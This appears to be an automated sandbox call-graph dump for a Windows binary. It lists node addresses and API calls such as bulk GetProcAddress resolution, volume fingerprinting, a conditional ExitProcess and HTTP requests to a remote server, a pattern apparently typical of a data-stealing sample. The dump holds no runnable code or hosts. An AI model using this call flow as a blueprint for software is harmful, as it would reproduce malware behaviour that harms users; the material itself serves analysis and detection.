14107 dc45c0 2 API calls 14106->14107 14108 dc3172 14107->14108 14109 dc45c0 2 API calls 14108->14109 14110 dc318b 14109->14110 14111 dc45c0 2 API calls 14110->14111 14112 dc31a4 14111->14112 14113 dc45c0 2 API calls 14112->14113 14114 dc31bd 14113->14114 14115 dc45c0 2 API calls 14114->14115 14116 dc31d6 14115->14116 14117 dc45c0 2 API calls 14116->14117 14118 dc31ef 14117->14118 14119 dc45c0 2 API calls 14118->14119 14120 dc3208 14119->14120 14121 dc45c0 2 API calls 14120->14121 14122 dc3221 14121->14122 14123 dc45c0 2 API calls 14122->14123 14124 dc323a 14123->14124 14125 dc45c0 2 API calls 14124->14125 14126 dc3253 14125->14126 14127 dc45c0 2 API calls 14126->14127 14128 dc326c 14127->14128 14129 dc45c0 2 API calls 14128->14129 14130 dc3285 14129->14130 14131 dc45c0 2 API calls 14130->14131 14132 dc329e 14131->14132 14133 dc45c0 2 API calls 14132->14133 14134 dc32b7 14133->14134 14135 dc45c0 2 API calls 14134->14135 14136 dc32d0 14135->14136 14137 dc45c0 2 API calls 14136->14137 14138 dc32e9 14137->14138 14139 dc45c0 2 API calls 14138->14139 14140 dc3302 14139->14140 14141 dc45c0 2 API calls 14140->14141 14142 dc331b 14141->14142 14143 dc45c0 2 API calls 14142->14143 14144 dc3334 14143->14144 14145 dc45c0 2 API calls 14144->14145 14146 dc334d 14145->14146 14147 dc45c0 2 API calls 14146->14147 14148 dc3366 14147->14148 14149 dc45c0 2 API calls 14148->14149 14150 dc337f 14149->14150 14151 dc45c0 2 API calls 14150->14151 14152 dc3398 14151->14152 14153 dc45c0 2 API calls 14152->14153 14154 dc33b1 14153->14154 14155 dc45c0 2 API calls 14154->14155 14156 dc33ca 14155->14156 14157 dc45c0 2 API calls 14156->14157 14158 dc33e3 14157->14158 14159 dc45c0 2 API calls 14158->14159 14160 dc33fc 14159->14160 14161 dc45c0 2 API calls 14160->14161 14162 dc3415 14161->14162 14163 dc45c0 2 API calls 14162->14163 14164 dc342e 14163->14164 14165 dc45c0 2 API calls 14164->14165 14166 dc3447 14165->14166 14167 dc45c0 2 API calls 14166->14167 14168 dc3460 14167->14168 14169 dc45c0 2 API calls 14168->14169 14170 dc3479 14169->14170 14171 dc45c0 2 API calls 14170->14171 14172 dc3492 14171->14172 14173 dc45c0 2 API calls 14172->14173 14174 dc34ab 14173->14174 14175 dc45c0 2 API calls 14174->14175 14176 dc34c4 14175->14176 14177 dc45c0 2 API calls 14176->14177 14178 dc34dd 14177->14178 14179 dc45c0 2 API calls 14178->14179 14180 dc34f6 14179->14180 14181 dc45c0 2 API calls 14180->14181 14182 dc350f 14181->14182 14183 dc45c0 2 API calls 14182->14183 14184 dc3528 14183->14184 14185 dc45c0 2 API calls 14184->14185 14186 dc3541 14185->14186 14187 dc45c0 2 API calls 14186->14187 14188 dc355a 14187->14188 14189 dc45c0 2 API calls 14188->14189 14190 dc3573 14189->14190 14191 dc45c0 2 API calls 14190->14191 14192 dc358c 14191->14192 14193 dc45c0 2 API calls 14192->14193 14194 dc35a5 14193->14194 14195 dc45c0 2 API calls 14194->14195 14196 dc35be 14195->14196 14197 dc45c0 2 API calls 14196->14197 14198 dc35d7 14197->14198 14199 dc45c0 2 API calls 14198->14199 14200 dc35f0 14199->14200 14201 dc45c0 2 API calls 14200->14201 14202 dc3609 14201->14202 14203 dc45c0 2 API calls 14202->14203 14204 dc3622 14203->14204 14205 dc45c0 2 API calls 14204->14205 14206 dc363b 14205->14206 14207 dc45c0 2 API calls 14206->14207 14208 dc3654 14207->14208 14209 dc45c0 2 API calls 14208->14209 14210 dc366d 14209->14210 14211 dc45c0 2 API calls 14210->14211 14212 dc3686 14211->14212 14213 dc45c0 2 API calls 14212->14213 14214 dc369f 14213->14214 14215 dc45c0 2 API calls 14214->14215 14216 dc36b8 14215->14216 14217 dc45c0 2 API calls 14216->14217 14218 dc36d1 14217->14218 14219 dc45c0 2 API calls 14218->14219 14220 dc36ea 14219->14220 14221 dc45c0 2 API calls 14220->14221 14222 dc3703 14221->14222 14223 dc45c0 2 API calls 14222->14223 14224 dc371c 14223->14224 14225 dc45c0 2 API calls 14224->14225 14226 dc3735 14225->14226 14227 dc45c0 2 API calls 14226->14227 14228 dc374e 14227->14228 14229 dc45c0 2 API calls 14228->14229 14230 dc3767 14229->14230 14231 dc45c0 2 API calls 14230->14231 14232 dc3780 14231->14232 14233 dc45c0 2 API calls 14232->14233 14234 dc3799 14233->14234 14235 dc45c0 2 API calls 14234->14235 14236 dc37b2 14235->14236 14237 dc45c0 2 API calls 14236->14237 14238 dc37cb 14237->14238 14239 dc45c0 2 API calls 14238->14239 14240 dc37e4 14239->14240 14241 dc45c0 2 API calls 14240->14241 14242 dc37fd 14241->14242 14243 dc45c0 2 API calls 14242->14243 14244 dc3816 14243->14244 14245 dc45c0 2 API calls 14244->14245 14246 dc382f 14245->14246 14247 dc45c0 2 API calls 14246->14247 14248 dc3848 14247->14248 14249 dc45c0 2 API calls 14248->14249 14250 dc3861 14249->14250 14251 dc45c0 2 API calls 14250->14251 14252 dc387a 14251->14252 14253 dc45c0 2 API calls 14252->14253 14254 dc3893 14253->14254 14255 dc45c0 2 API calls 14254->14255 14256 dc38ac 14255->14256 14257 dc45c0 2 API calls 14256->14257 14258 dc38c5 14257->14258 14259 dc45c0 2 API calls 14258->14259 14260 dc38de 14259->14260 14261 dc45c0 2 API calls 14260->14261 14262 dc38f7 14261->14262 14263 dc45c0 2 API calls 14262->14263 14264 dc3910 14263->14264 14265 dc45c0 2 API calls 14264->14265 14266 dc3929 14265->14266 14267 dc45c0 2 API calls 14266->14267 14268 dc3942 14267->14268 14269 dc45c0 2 API calls 14268->14269 14270 dc395b 14269->14270 14271 dc45c0 2 API calls 14270->14271 14272 dc3974 14271->14272 14273 dc45c0 2 API calls 14272->14273 14274 dc398d 14273->14274 14275 dc45c0 2 API calls 14274->14275 14276 dc39a6 14275->14276 14277 dc45c0 2 API calls 14276->14277 14278 dc39bf 14277->14278 14279 dc45c0 2 API calls 14278->14279 14280 dc39d8 14279->14280 14281 dc45c0 2 API calls 14280->14281 14282 dc39f1 14281->14282 14283 dc45c0 2 API calls 14282->14283 14284 dc3a0a 14283->14284 14285 dc45c0 2 API calls 14284->14285 14286 dc3a23 14285->14286 14287 dc45c0 2 API calls 14286->14287 14288 dc3a3c 14287->14288 14289 dc45c0 2 API calls 14288->14289 14290 dc3a55 14289->14290 14291 dc45c0 2 API calls 14290->14291 14292 dc3a6e 14291->14292 14293 dc45c0 2 API calls 14292->14293 14294 dc3a87 14293->14294 14295 dc45c0 2 API calls 14294->14295 14296 dc3aa0 14295->14296 14297 dc45c0 2 API calls 14296->14297 14298 dc3ab9 14297->14298 14299 dc45c0 2 API calls 14298->14299 14300 dc3ad2 14299->14300 14301 dc45c0 2 API calls 14300->14301 14302 dc3aeb 14301->14302 14303 dc45c0 2 API calls 14302->14303 14304 dc3b04 14303->14304 14305 dc45c0 2 API calls 14304->14305 14306 dc3b1d 14305->14306 14307 dc45c0 2 API calls 14306->14307 14308 dc3b36 14307->14308 14309 dc45c0 2 API calls 14308->14309 14310 dc3b4f 14309->14310 14311 dc45c0 2 API calls 14310->14311 14312 dc3b68 14311->14312 14313 dc45c0 2 API calls 14312->14313 14314 dc3b81 14313->14314 14315 dc45c0 2 API calls 14314->14315 14316 dc3b9a 14315->14316 14317 dc45c0 2 API calls 14316->14317 14318 dc3bb3 14317->14318 14319 dc45c0 2 API calls 14318->14319 14320 dc3bcc 14319->14320 14321 dc45c0 2 API calls 14320->14321 14322 dc3be5 14321->14322 14323 dc45c0 2 API calls 14322->14323 14324 dc3bfe 14323->14324 14325 dc45c0 2 API calls 14324->14325 14326 dc3c17 14325->14326 14327 dc45c0 2 API calls 14326->14327 14328 dc3c30 14327->14328 14329 dc45c0 2 API calls 14328->14329 14330 dc3c49 14329->14330 14331 dc45c0 2 API calls 14330->14331 14332 dc3c62 14331->14332 14333 dc45c0 2 API calls 14332->14333 14334 dc3c7b 14333->14334 14335 dc45c0 2 API calls 14334->14335 14336 dc3c94 14335->14336 14337 dc45c0 2 API calls 14336->14337 14338 dc3cad 14337->14338 14339 dc45c0 2 API calls 14338->14339 14340 dc3cc6 14339->14340 14341 dc45c0 2 API calls 14340->14341 14342 dc3cdf 14341->14342 14343 dc45c0 2 API calls 14342->14343 14344 dc3cf8 14343->14344 14345 dc45c0 2 API calls 14344->14345 14346 dc3d11 14345->14346 14347 dc45c0 2 API calls 14346->14347 14348 dc3d2a 14347->14348 14349 dc45c0 2 API calls 14348->14349 14350 dc3d43 14349->14350 14351 dc45c0 2 API calls 14350->14351 14352 dc3d5c 14351->14352 14353 dc45c0 2 API calls 14352->14353 14354 dc3d75 14353->14354 14355 dc45c0 2 API calls 14354->14355 14356 dc3d8e 14355->14356 14357 dc45c0 2 API calls 14356->14357 14358 dc3da7 14357->14358 14359 dc45c0 2 API calls 14358->14359 14360 dc3dc0 14359->14360 14361 dc45c0 2 API calls 14360->14361 14362 dc3dd9 14361->14362 14363 dc45c0 2 API calls 14362->14363 14364 dc3df2 14363->14364 14365 dc45c0 2 API calls 14364->14365 14366 dc3e0b 14365->14366 14367 dc45c0 2 API calls 14366->14367 14368 dc3e24 14367->14368 14369 dc45c0 2 API calls 14368->14369 14370 dc3e3d 14369->14370 14371 dc45c0 2 API calls 14370->14371 14372 dc3e56 14371->14372 14373 dc45c0 2 API calls 14372->14373 14374 dc3e6f 14373->14374 14375 dc45c0 2 API calls 14374->14375 14376 dc3e88 14375->14376 14377 dc45c0 2 API calls 14376->14377 14378 dc3ea1 14377->14378 14379 dc45c0 2 API calls 14378->14379 14380 dc3eba 14379->14380 14381 dc45c0 2 API calls 14380->14381 14382 dc3ed3 14381->14382 14383 dc45c0 2 API calls 14382->14383 14384 dc3eec 14383->14384 14385 dc45c0 2 API calls 14384->14385 14386 dc3f05 14385->14386 14387 dc45c0 2 API calls 14386->14387 14388 dc3f1e 14387->14388 14389 dc45c0 2 API calls 14388->14389 14390 dc3f37 14389->14390 14391 dc45c0 2 API calls 14390->14391 14392 dc3f50 14391->14392 14393 dc45c0 2 API calls 14392->14393 14394 dc3f69 14393->14394 14395 dc45c0 2 API calls 14394->14395 14396 dc3f82 14395->14396 14397 dc45c0 2 API calls 14396->14397 14398 dc3f9b 14397->14398 14399 dc45c0 2 API calls 14398->14399 14400 dc3fb4 14399->14400 14401 dc45c0 2 API calls 14400->14401 14402 dc3fcd 14401->14402 14403 dc45c0 2 API calls 14402->14403 14404 dc3fe6 14403->14404 14405 dc45c0 2 API calls 14404->14405 14406 dc3fff 14405->14406 14407 dc45c0 2 API calls 14406->14407 14408 dc4018 14407->14408 14409 dc45c0 2 API calls 14408->14409 14410 dc4031 14409->14410 14411 dc45c0 2 API calls 14410->14411 14412 dc404a 14411->14412 14413 dc45c0 2 API calls 14412->14413 14414 dc4063 14413->14414 14415 dc45c0 2 API calls 14414->14415 14416 dc407c 14415->14416 14417 dc45c0 2 API calls 14416->14417 14418 dc4095 14417->14418 14419 dc45c0 2 API calls 14418->14419 14420 dc40ae 14419->14420 14421 dc45c0 2 API calls 14420->14421 14422 dc40c7 14421->14422 14423 dc45c0 2 API calls 14422->14423 14424 dc40e0 14423->14424 14425 dc45c0 2 API calls 14424->14425 14426 dc40f9 14425->14426 14427 dc45c0 2 API calls 14426->14427 14428 dc4112 14427->14428 14429 dc45c0 2 API calls 14428->14429 14430 dc412b 14429->14430 14431 dc45c0 2 API calls 14430->14431 14432 dc4144 14431->14432 14433 dc45c0 2 API calls 14432->14433 14434 dc415d 14433->14434 14435 dc45c0 2 API calls 14434->14435 14436 dc4176 14435->14436 14437 dc45c0 2 API calls 14436->14437 14438 dc418f 14437->14438 14439 dc45c0 2 API calls 14438->14439 14440 dc41a8 14439->14440 14441 dc45c0 2 API calls 14440->14441 14442 dc41c1 14441->14442 14443 dc45c0 2 API calls 14442->14443 14444 dc41da 14443->14444 14445 dc45c0 2 API calls 14444->14445 14446 dc41f3 14445->14446 14447 dc45c0 2 API calls 14446->14447 14448 dc420c 14447->14448 14449 dc45c0 2 API calls 14448->14449 14450 dc4225 14449->14450 14451 dc45c0 2 API calls 14450->14451 14452 dc423e 14451->14452 14453 dc45c0 2 API calls 14452->14453 14454 dc4257 14453->14454 14455 dc45c0 2 API calls 14454->14455 14456 dc4270 14455->14456 14457 dc45c0 2 API calls 14456->14457 14458 dc4289 14457->14458 14459 dc45c0 2 API calls 14458->14459 14460 dc42a2 14459->14460 14461 dc45c0 2 API calls 14460->14461 14462 dc42bb 14461->14462 14463 dc45c0 2 API calls 14462->14463 14464 dc42d4 14463->14464 14465 dc45c0 2 API calls 14464->14465 14466 dc42ed 14465->14466 14467 dc45c0 2 API calls 14466->14467 14468 dc4306 14467->14468 14469 dc45c0 2 API calls 14468->14469 14470 dc431f 14469->14470 14471 dc45c0 2 API calls 14470->14471 14472 dc4338 14471->14472 14473 dc45c0 2 API calls 14472->14473 14474 dc4351 14473->14474 14475 dc45c0 2 API calls 14474->14475 14476 dc436a 14475->14476 14477 dc45c0 2 API calls 14476->14477 14478 dc4383 14477->14478 14479 dc45c0 2 API calls 14478->14479 14480 dc439c 14479->14480 14481 dc45c0 2 API calls 14480->14481 14482 dc43b5 14481->14482 14483 dc45c0 2 API calls 14482->14483 14484 dc43ce 14483->14484 14485 dc45c0 2 API calls 14484->14485 14486 dc43e7 14485->14486 14487 dc45c0 2 API calls 14486->14487 14488 dc4400 14487->14488 14489 dc45c0 2 API calls 14488->14489 14490 dc4419 14489->14490 14491 dc45c0 2 API calls 14490->14491 14492 dc4432 14491->14492 14493 dc45c0 2 API calls 14492->14493 14494 dc444b 14493->14494 14495 dc45c0 2 API calls 14494->14495 14496 dc4464 14495->14496 14497 dc45c0 2 API calls 14496->14497 14498 dc447d 14497->14498 14499 dc45c0 2 API calls 14498->14499 14500 dc4496 14499->14500 14501 dc45c0 2 API calls 14500->14501 14502 dc44af 14501->14502 14503 dc45c0 2 API calls 14502->14503 14504 dc44c8 14503->14504 14505 dc45c0 2 API calls 14504->14505 14506 dc44e1 14505->14506 14507 dc45c0 2 API calls 14506->14507 14508 dc44fa 14507->14508 14509 dc45c0 2 API calls 14508->14509 14510 dc4513 14509->14510 14511 dc45c0 2 API calls 14510->14511 14512 dc452c 14511->14512 14513 dc45c0 2 API calls 14512->14513 14514 dc4545 14513->14514 14515 dc45c0 2 API calls 14514->14515 14516 dc455e 14515->14516 14517 dc45c0 2 API calls 14516->14517 14518 dc4577 14517->14518 14519 dc45c0 2 API calls 14518->14519 14520 dc4590 14519->14520 14521 dc45c0 2 API calls 14520->14521 14522 dc45a9 14521->14522 14523 dd9c10 14522->14523 14524 dda036 8 API calls 14523->14524 14525 dd9c20 43 API calls 14523->14525 14526 dda0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14524->14526 14527 dda146 14524->14527 14525->14524 14526->14527 14528 dda216 14527->14528 14529 dda153 8 API calls 14527->14529 14530 dda21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 dda298 14528->14531 14529->14528 14530->14531 14532 dda2a5 6 API calls 14531->14532 14533 dda337 14531->14533 14532->14533 14534 dda41f 14533->14534 14535 dda344 9 API calls 14533->14535 14536 dda428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14534->14536 14537 dda4a2 14534->14537 14535->14534 14536->14537 14538 dda4dc 14537->14538 14539 dda4ab GetProcAddress GetProcAddress 14537->14539 14540 dda515 14538->14540 14541 dda4e5 GetProcAddress GetProcAddress 14538->14541 14539->14538 14542 dda612 14540->14542 14543 dda522 10 API calls 14540->14543 14541->14540 14544 dda67d 14542->14544 14545 dda61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14545 14543->14542 14546 dda69e 14544->14546 14547 dda686 GetProcAddress 14544->14547 14545->14544 14548 dd5ca3 14546->14548 14549 dda6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14546->14549 14547->14546 14550 dc1590 14548->14550 14549->14548 15671 dc1670 14550->15671 14553 dda7a0 lstrcpy 14554 dc15b5 14553->14554 14555 dda7a0 lstrcpy 14554->14555 14556 dc15c7 14555->14556 14557 dda7a0 lstrcpy 14556->14557 14558 dc15d9 14557->14558 14559 dda7a0 lstrcpy 14558->14559 14560 dc1663 14559->14560 14561 dd5510 14560->14561 14562 dd5521 14561->14562 14563 dda820 2 API calls 14562->14563 14564 dd552e 14563->14564 14565 dda820 2 API calls 14564->14565 14566 dd553b 14565->14566 14567 dda820 2 API calls 14566->14567 14568 dd5548 14567->14568 14569 dda740 lstrcpy 14568->14569 14570 dd5555 14569->14570 14571 dda740 lstrcpy 14570->14571 14572 dd5562 14571->14572 14573 dda740 lstrcpy 14572->14573 14574 dd556f 14573->14574 14575 dda740 lstrcpy 14574->14575 14614 dd557c 14575->14614 14576 dd5643 StrCmpCA 14576->14614 14577 dd56a0 StrCmpCA 14578 dd57dc 14577->14578 14577->14614 14579 dda8a0 lstrcpy 14578->14579 14580 dd57e8 14579->14580 14581 dda820 2 API calls 14580->14581 14584 dd57f6 14581->14584 14582 dda820 lstrlen lstrcpy 14582->14614 14583 dd51f0 20 API calls 14583->14614 14586 dda820 2 API calls 14584->14586 14585 dd5856 StrCmpCA 14587 dd5991 14585->14587 14585->14614 14589 dd5805 14586->14589 14588 dda8a0 lstrcpy 14587->14588 14590 dd599d 14588->14590 14591 dc1670 lstrcpy 14589->14591 14592 dda820 2 API calls 14590->14592 14615 dd5811 14591->14615 14594 dd59ab 14592->14594 14593 dda740 lstrcpy 14593->14614 14596 dda820 2 API calls 14594->14596 14595 dd5a0b StrCmpCA 14597 dd5a28 14595->14597 14598 dd5a16 Sleep 14595->14598 14600 dd59ba 14596->14600 14601 dda8a0 lstrcpy 14597->14601 14598->14614 14599 dda7a0 lstrcpy 14599->14614 14602 dc1670 lstrcpy 14600->14602 14603 dd5a34 14601->14603 14602->14615 14604 dda820 2 API calls 14603->14604 14605 dd5a43 14604->14605 14607 dda820 2 API calls 14605->14607 14606 dd52c0 25 API calls 14606->14614 14608 dd5a52 14607->14608 14610 dc1670 lstrcpy 14608->14610 14609 dd578a StrCmpCA 14609->14614 14610->14615 14611 dc1590 lstrcpy 14611->14614 14612 dd593f StrCmpCA 14612->14614 14613 dda8a0 lstrcpy 14613->14614 14614->14576 14614->14577 14614->14582 14614->14583 14614->14585 14614->14593 14614->14595 14614->14599 14614->14606 14614->14609 14614->14611 14614->14612 14614->14613 14615->13668 14617 dd754c 14616->14617 14618 dd7553 GetVolumeInformationA 14616->14618 14617->14618 14619 dd7591 14618->14619 14620 dd75fc GetProcessHeap RtlAllocateHeap 14619->14620 14621 dd7619 14620->14621 14622 dd7628 wsprintfA 14620->14622 14623 dda740 lstrcpy 14621->14623 14624 dda740 lstrcpy 14622->14624 14625 dd5da7 14623->14625 14624->14625 14625->13689 14627 dda7a0 lstrcpy 14626->14627 14628 dc4899 14627->14628 15680 dc47b0 14628->15680 14630 dc48a5 14631 dda740 lstrcpy 14630->14631 14632 dc48d7 14631->14632 14633 dda740 lstrcpy 14632->14633 14634 dc48e4 14633->14634 14635 dda740 lstrcpy 14634->14635 14636 dc48f1 14635->14636 14637 dda740 lstrcpy 14636->14637 14638 dc48fe 14637->14638 14639 dda740 lstrcpy 14638->14639 14640 dc490b InternetOpenA StrCmpCA 14639->14640 14641 dc4944 14640->14641 14642 dc4ecb InternetCloseHandle 14641->14642 15686 dd8b60 14641->15686 14644 dc4ee8 14642->14644 15701 dc9ac0 CryptStringToBinaryA 14644->15701 14645 dc4963 15694 dda920 14645->15694 14649 dc4976 14650 dda8a0 lstrcpy 14649->14650 14655 dc497f 14650->14655 14651 dda820 2 API calls 14652 dc4f05 14651->14652 14653 dda9b0 4 API calls 14652->14653 14656 dc4f1b 14653->14656 14654 dc4f27 codecvt 14657 dda7a0 lstrcpy 14654->14657 14659 dda9b0 4 API calls 14655->14659 14658 dda8a0 lstrcpy 14656->14658 14670 dc4f57 14657->14670 14658->14654 14660 dc49a9 14659->14660 14661 dda8a0 lstrcpy 14660->14661 14662 dc49b2 14661->14662 14663 dda9b0 4 API calls 14662->14663 14664 dc49d1 14663->14664 14665 dda8a0 lstrcpy 14664->14665 14666 dc49da 14665->14666 14667 dda920 3 API calls 14666->14667 14668 dc49f8 14667->14668 14669 dda8a0 lstrcpy 14668->14669 14671 dc4a01 14669->14671 14670->13692 14672 dda9b0 4 API calls 14671->14672 14673 dc4a20 14672->14673 14674 dda8a0 lstrcpy 14673->14674 14675 dc4a29 14674->14675 14676 dda9b0 4 API calls 14675->14676 14677 dc4a48 14676->14677 14678 dda8a0 lstrcpy 14677->14678 14679 dc4a51 14678->14679 14680 dda9b0 4 API calls 14679->14680 14681 dc4a7d 14680->14681 14682 dda920 3 API calls 14681->14682 14683 dc4a84 14682->14683 14684 dda8a0 lstrcpy 14683->14684 14685 dc4a8d 14684->14685 14686 dc4aa3 InternetConnectA 14685->14686 14686->14642 14687 dc4ad3 HttpOpenRequestA 14686->14687 14689 dc4ebe InternetCloseHandle 14687->14689 14690 dc4b28 14687->14690 14689->14642 14691 dda9b0 4 API calls 14690->14691 14692 dc4b3c 14691->14692 14693 dda8a0 lstrcpy 14692->14693 14694 dc4b45 14693->14694 14695 dda920 3 API calls 14694->14695 14696 dc4b63 14695->14696 14697 dda8a0 lstrcpy 14696->14697 14698 dc4b6c 14697->14698 14699 dda9b0 4 API calls 14698->14699 14700 dc4b8b 14699->14700 14701 dda8a0 lstrcpy 14700->14701 14702 dc4b94 14701->14702 14703 dda9b0 4 API calls 14702->14703 14704 dc4bb5 14703->14704 14705 dda8a0 lstrcpy 14704->14705 14706 dc4bbe 14705->14706 14707 dda9b0 4 API calls 14706->14707 14708 dc4bde 14707->14708 14709 dda8a0 lstrcpy 14708->14709 14710 dc4be7 14709->14710 14711 dda9b0 4 API calls 14710->14711 14712 dc4c06 14711->14712 14713 dda8a0 lstrcpy 14712->14713 14714 dc4c0f 14713->14714 14715 dda920 3 API calls 14714->14715 14716 dc4c2d 14715->14716 14717 dda8a0 lstrcpy 14716->14717 14718 dc4c36 14717->14718 14719 dda9b0 4 API calls 14718->14719 14720 dc4c55 14719->14720 14721 dda8a0 lstrcpy 14720->14721 14722 dc4c5e 14721->14722 14723 dda9b0 4 API calls 14722->14723 14724 dc4c7d 14723->14724 14725 dda8a0 lstrcpy 14724->14725 14726 dc4c86 14725->14726 14727 dda920 3 API calls 14726->14727 14728 dc4ca4 14727->14728 14729 dda8a0 lstrcpy 14728->14729 14730 dc4cad 14729->14730 14731 dda9b0 4 API calls 14730->14731 14732 dc4ccc 14731->14732 14733 dda8a0 lstrcpy 14732->14733 14734 dc4cd5 14733->14734 14735 dda9b0 4 API calls 14734->14735 14736 dc4cf6 14735->14736 14737 dda8a0 lstrcpy 14736->14737 14738 dc4cff 14737->14738 14739 dda9b0 4 API calls 14738->14739 14740 dc4d1f 14739->14740 14741 dda8a0 lstrcpy 14740->14741 14742 dc4d28 14741->14742 14743 dda9b0 4 API calls 14742->14743 14744 dc4d47 14743->14744 14745 dda8a0 lstrcpy 14744->14745 14746 dc4d50 14745->14746 14747 dda920 3 API calls 14746->14747 14748 dc4d6e 14747->14748 14749 dda8a0 lstrcpy 14748->14749 14750 dc4d77 14749->14750 14751 dda740 lstrcpy 14750->14751 14752 dc4d92 14751->14752 14753 dda920 3 API calls 14752->14753 14754 dc4db3 14753->14754 14755 dda920 3 API calls 14754->14755 14756 dc4dba 14755->14756 14757 dda8a0 lstrcpy 14756->14757 14758 dc4dc6 14757->14758 14759 dc4de7 lstrlen 14758->14759 14760 dc4dfa 14759->14760 14761 dc4e03 lstrlen 14760->14761 15700 ddaad0 14761->15700 14763 dc4e13 HttpSendRequestA 14764 dc4e32 InternetReadFile 14763->14764 14765 dc4e67 InternetCloseHandle 14764->14765 14770 dc4e5e 14764->14770 14768 dda800 14765->14768 14767 dda9b0 4 API calls 14767->14770 14768->14689 14769 dda8a0 lstrcpy 14769->14770 14770->14764 14770->14765 14770->14767 14770->14769 15707 ddaad0 14771->15707 14773 dd17c4 StrCmpCA 14774 dd17cf ExitProcess 14773->14774 14776 dd17d7 14773->14776 14775 dd19c2 14775->13694 14776->14775 14777 dd185d StrCmpCA 14776->14777 14778 dd187f StrCmpCA 14776->14778 14779 dd18f1 StrCmpCA 14776->14779 14780 dd1951 StrCmpCA 14776->14780 14781 dd1970 StrCmpCA 14776->14781 14782 dd1913 StrCmpCA 14776->14782 14783 dd1932 StrCmpCA 14776->14783 14784 dd18ad StrCmpCA 14776->14784 14785 dd18cf StrCmpCA 14776->14785 14786 dda820 lstrlen lstrcpy 14776->14786 14777->14776 14778->14776 14779->14776 14780->14776 14781->14776 14782->14776 14783->14776 14784->14776 14785->14776 14786->14776 14788 dda7a0 lstrcpy 14787->14788 14789 dc5979 14788->14789 14790 dc47b0 2 API calls 14789->14790 14791 dc5985 14790->14791 14792 dda740 lstrcpy 14791->14792 14793 dc59ba 14792->14793 14794 dda740 lstrcpy 14793->14794 14795 dc59c7 14794->14795 14796 dda740 lstrcpy 14795->14796 14797 dc59d4 14796->14797 14798 dda740 lstrcpy 14797->14798 14799 dc59e1 14798->14799 14800 dda740 lstrcpy 14799->14800 14801 dc59ee InternetOpenA StrCmpCA 14800->14801 14802 dc5a1d 14801->14802 14803 dc5fc3 InternetCloseHandle 14802->14803 14804 dd8b60 3 API calls 14802->14804 14805 dc5fe0 14803->14805 14806 dc5a3c 14804->14806 14808 dc9ac0 4 API calls 14805->14808 14807 dda920 3 API calls 14806->14807 14809 dc5a4f 14807->14809 14810 dc5fe6 14808->14810 14811 dda8a0 lstrcpy 14809->14811 14812 dda820 2 API calls 14810->14812 14814 dc601f codecvt 14810->14814 14817 dc5a58 14811->14817 14813 dc5ffd 14812->14813 14815 dda9b0 4 API calls 14813->14815 14819 dda7a0 lstrcpy 14814->14819 14816 dc6013 14815->14816 14818 dda8a0 lstrcpy 14816->14818 14820 dda9b0 4 API calls 14817->14820 14818->14814 14828 dc604f 14819->14828 14821 dc5a82 14820->14821 14822 dda8a0 lstrcpy 14821->14822 14823 dc5a8b 14822->14823 14824 dda9b0 4 API calls 14823->14824 14825 dc5aaa 14824->14825 14826 dda8a0 lstrcpy 14825->14826 14827 dc5ab3 14826->14827 14829 dda920 3 API calls 14827->14829 14828->13700 14830 dc5ad1 14829->14830 14831 dda8a0 lstrcpy 14830->14831 14832 dc5ada 14831->14832 14833 dda9b0 4 API calls 14832->14833 14834 dc5af9 14833->14834 14835 dda8a0 lstrcpy 14834->14835 14836 dc5b02 14835->14836 14837 dda9b0 4 API calls 14836->14837 14838 dc5b21 14837->14838 14839 dda8a0 lstrcpy 14838->14839 14840 dc5b2a 14839->14840 14841 dda9b0 4 API calls 14840->14841 14842 dc5b56 14841->14842 14843 dda920 3 API calls 14842->14843 14844 dc5b5d 14843->14844 14845 dda8a0 lstrcpy 14844->14845 14846 dc5b66 14845->14846 14847 dc5b7c InternetConnectA 14846->14847 14847->14803 14848 dc5bac HttpOpenRequestA 14847->14848 14850 dc5c0b 14848->14850 14851 dc5fb6 InternetCloseHandle 14848->14851 14852 dda9b0 4 API calls 14850->14852 14851->14803 14853 dc5c1f 14852->14853 14854 dda8a0 lstrcpy 14853->14854 14855 dc5c28 14854->14855 14856 dda920 3 API calls 14855->14856 14857 dc5c46 14856->14857 14858 dda8a0 lstrcpy 14857->14858 14859 dc5c4f 14858->14859 14860 dda9b0 4 API calls 14859->14860 14861 dc5c6e 14860->14861 14862 dda8a0 lstrcpy 14861->14862 14863 dc5c77 14862->14863 14864 dda9b0 4 API calls 14863->14864 14865 dc5c98 14864->14865 14866 dda8a0 lstrcpy 14865->14866 14867 dc5ca1 14866->14867 14868 dda9b0 4 API calls 14867->14868 14869 dc5cc1 14868->14869 14870 dda8a0 lstrcpy 14869->14870 14871 dc5cca 14870->14871 14872 dda9b0 4 API calls 14871->14872 14873 dc5ce9 14872->14873 14874 dda8a0 lstrcpy 14873->14874 14875 dc5cf2 14874->14875 14876 dda920 3 API calls 14875->14876 14877 dc5d10 14876->14877 14878 dda8a0 lstrcpy 14877->14878 14879 dc5d19 14878->14879 14880 dda9b0 4 API calls 14879->14880 14881 dc5d38 14880->14881 14882 dda8a0 lstrcpy 14881->14882 14883 dc5d41 14882->14883 14884 dda9b0 4 API calls 14883->14884 14885 dc5d60 14884->14885 14886 dda8a0 lstrcpy 14885->14886 14887 dc5d69 14886->14887 14888 dda920 3 API calls 14887->14888 14889 dc5d87 14888->14889 14890 dda8a0 lstrcpy 14889->14890 14891 dc5d90 14890->14891 14892 dda9b0 4 API calls 14891->14892 14893 dc5daf 14892->14893 14894 dda8a0 lstrcpy 14893->14894 14895 dc5db8 14894->14895 14896 dda9b0 4 API calls 14895->14896 14897 dc5dd9 14896->14897 14898 dda8a0 lstrcpy 14897->14898 14899 dc5de2 14898->14899 14900 dda9b0 4 API calls 14899->14900 14901 dc5e02 14900->14901 14902 dda8a0 lstrcpy 14901->14902 14903 dc5e0b 14902->14903 14904 dda9b0 4 API calls 14903->14904 14905 dc5e2a 14904->14905 14906 dda8a0 lstrcpy 14905->14906 14907 dc5e33 14906->14907 14908 dda920 3 API calls 14907->14908 14909 dc5e54 14908->14909 14910 dda8a0 lstrcpy 14909->14910 14911 dc5e5d 14910->14911 14912 dc5e70 lstrlen 14911->14912 15708 ddaad0 14912->15708 14914 dc5e81 lstrlen GetProcessHeap RtlAllocateHeap 15709 ddaad0 14914->15709 14916 dc5eae lstrlen 14917 dc5ebe 14916->14917 14918 dc5ed7 lstrlen 